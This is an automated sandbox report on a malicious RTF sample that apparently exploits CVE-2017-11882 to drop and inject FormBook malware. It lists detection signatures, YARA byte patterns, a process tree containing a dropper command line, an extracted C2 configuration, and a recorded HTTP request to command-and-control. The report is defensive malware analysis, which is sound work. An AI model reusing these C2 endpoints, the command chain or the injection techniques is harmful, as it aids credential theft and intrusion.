Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
Analysis ID:680332
MD5:26111b2647fc8b1e3e123e825f716b94
SHA1:131907f569a2774c1800430ccf052896dc685ec0
SHA256:7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
Tags:rtf
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Office process drops PE file
Writes to foreign memory regions
Document contains OLE streams with names of living off the land binaries
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Found suspicious RTF objects
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2992 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: D94161753531177B2FB80365ADDCBFA8)
        • notepad.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 204 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • firefox.exe (PID: 2420 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfMAL_RTF_Embedded_OLE_PEDetects a suspicious string often used in PE files in a hex encoded object streamFlorian Roth
  • 0x78b4:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x7818:$m1: 4d5a90000300000004000000ffff
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1269:$obj2: \objdata
  • 0x1df799:$obj2: \objdata
  • 0x2bfdaf:$obj3: \objupdate
  • 0x8de:$obj4: \objemb
  • 0x1dee0e:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmprtf_cve2017_11882_oleAttempts to identify the exploit CVE 2017 11882John Davison
  • 0xea600:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xea621:$font: 0A 01 08 5A 5A
  • 0xea652:$winexec: 12 0C 43 00
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xea500:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xea629:$exe: .exe
  • 0xea63d:$exe: .exe
  • 0xea652:$address: 12 0C 43 00

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18e29:$sqlite3step: 68 34 1C 7B E1
    • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
    • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
    • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
    • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 62 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.notepad.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.notepad.exe.400000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.2.notepad.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.notepad.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18e29:$sqlite3step: 68 34 1C 7B E1
        • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
        • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
        • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
        • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C
        9.0.notepad.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 39 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtfReversingLabs: Detection: 14%
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeReversingLabs: Detection: 21%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Client.exeJoe Sandbox ML: detected
          Source: 9.0.notepad.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.notepad.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
          Found potential equation exploit (CVE-2017-11882)
          Source: Static RTF information: Object: 1 Offset: 001DF7BDh
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465588/\x1CompObj' : ...................F....Microsoft Equation 3.0....
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: Client.exe.0.drJump to dropped file
          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to behavior
          Source: global trafficDNS query: name: www.magadirect.co.uk
          Source: global trafficDNS query: name: www.sqlite.org
          Source: global trafficDNS query: name: www.luanaterra.online
          Source: global trafficDNS query: name: www.hogogala.com
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
          Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.magadirect.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.18.44 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.bookmarkfiles.info/aekc/
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 45.33.18.44 45.33.18.44
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 08 Aug 2022 10:08:49 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 08 Aug 2022 10:09:09 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
